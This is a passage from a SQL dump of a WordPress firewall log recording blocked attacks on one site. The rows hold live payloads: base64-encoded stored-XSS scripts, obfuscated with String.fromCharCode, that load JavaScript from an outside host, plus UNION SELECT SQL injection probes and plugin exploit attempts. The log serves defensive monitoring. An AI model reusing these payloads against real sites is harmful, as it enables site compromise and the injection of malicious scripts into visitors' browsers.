g0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAnYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8031,1564682557.296595,1564682556.547700,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8032,1564682555.669247,1564682555.078200,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php?action=wcp_change_post_width',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dpZHRoXQ==\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8132,1564715916.017745,1564715915.699100,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICdhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8033,1564682554.052410,1564682553.546300,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8034,1564682552.676586,1564682551.989000,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WooCommerce User Email Verification <= 3.3.0 - Unauthenticated Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"142\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3d1ZXZfZm9ybV90eXBlXQ==\",\"paramValue\":\"c2l0ZXVybA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8133,1564715902.779173,1564715902.357000,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgJ2FzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8035,1564682594.519580,1564682593.208900,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8126,1564715930.806637,1564715930.373800,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C50%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTcsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ4LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MCw0OSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTAsNTAsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICdhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8125,1564715932.369998,1564715931.941400,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C51%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTcsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ4LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MCw0OSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTAsNTAsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDUxLDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAnYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8124,1564715934.009471,1564715933.544800,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C52%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTcsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ4LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MCw0OSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTAsNTAsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDUxLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MCw1Miw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgJ2FzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8036,1564682591.883030,1564682590.225800,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(7821,1564591603.854645,1564591603.450500,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site 